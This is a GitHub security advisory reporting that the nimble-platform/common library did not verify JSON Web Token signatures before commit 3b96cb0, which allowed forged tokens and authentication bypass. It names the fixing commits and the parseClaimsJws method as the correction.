oliver-jung
published
GHSA-fjq8-896w-pv28Jul 26, 2021
Package
No package listed
Affected versions
<3b96cb0
Patched versions
>=3b96cb0
Description
Impact
https://github.com/nimble-platform/common before version 3b96cb0 did not properly verify the signature of JSON Web Tokens.
This allows to forge a valid JWT.
Being able to forge JWTs may lead to authentication bypasses.
Patches
Problem patched on master in version 3b96cb0 and above. Relevant commits are 12197a7 and a59ad46.
Impact
https://github.com/nimble-platform/common before version 3b96cb0 did not properly verify the signature of JSON Web Tokens.
This allows to forge a valid JWT.
Being able to forge JWTs may lead to authentication bypasses.
Patches
Problem patched on master in version 3b96cb0 and above. Relevant commits are 12197a7 and a59ad46.
Workarounds
https://github.com/nimble-platform/common in https://github.com/nimble-platform/common/blob/master/utility/src/main/java/eu/nimble/utility/validation/ValidationUtil.java#L39 uses the parse method to parse the received JWT.
The parse method does not verify the signature of a JWT.
To correctly verify the signature of a JWT, one should use the parseClaimsJws method instead.
References
https://jwt.io/
For more information
If you have any questions or comments about this advisory: